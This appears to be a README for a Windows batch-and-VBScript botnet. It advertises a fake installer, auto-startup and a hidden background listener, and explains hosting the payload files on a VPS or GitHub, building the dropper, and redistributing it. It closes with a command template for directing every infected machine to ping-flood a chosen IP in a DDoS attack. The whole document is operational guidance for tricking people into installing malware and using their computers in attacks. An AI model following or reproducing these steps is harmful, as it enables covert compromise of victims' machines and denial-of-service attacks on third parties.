Features • Installation • Usage
- Fake installator
- Auto Installer
- Auto startup
- Background listener
To Install this project, follow the steps above:
# Install the botnet
Extract the ZIP in some folder
# Open your host (Vps/Dedicated/Host just something that can host)
Put the files into some folder.
├─ index.html
└─── botnet
├── Install.bat (Optional. That just the main installer)
├── hidden.vbs
├── install2.bat
└── listener.bat
Like that the download link need to see like that `http(s)://<ip/domain>/botnet/listener.bat`
You need to give access to download the files
# Open cmd and execute: (Too can double click on Creator.bat)
$ start Creator.bat
and follow the steeps
# After that open the listener and modify the raw controller (Attack, Command and Times file)
To use this project, follow the steps above:
# Redistribute the file
# Open your vps/host
# Modify the raws
file "times"
Just add the times for the loop of the command
file "command"
Command to execute
file "attack"
change any text to "yes" (cAsE sEnSiTiVe) and start the attack. e.g:
times: 9999
command: ping <ip to ddos> -n 1 (Just 1 req for do times correctly work)
attack: do all the machines you control start attacking (If you use github like me, it will go with 5minutes delay for github cache.)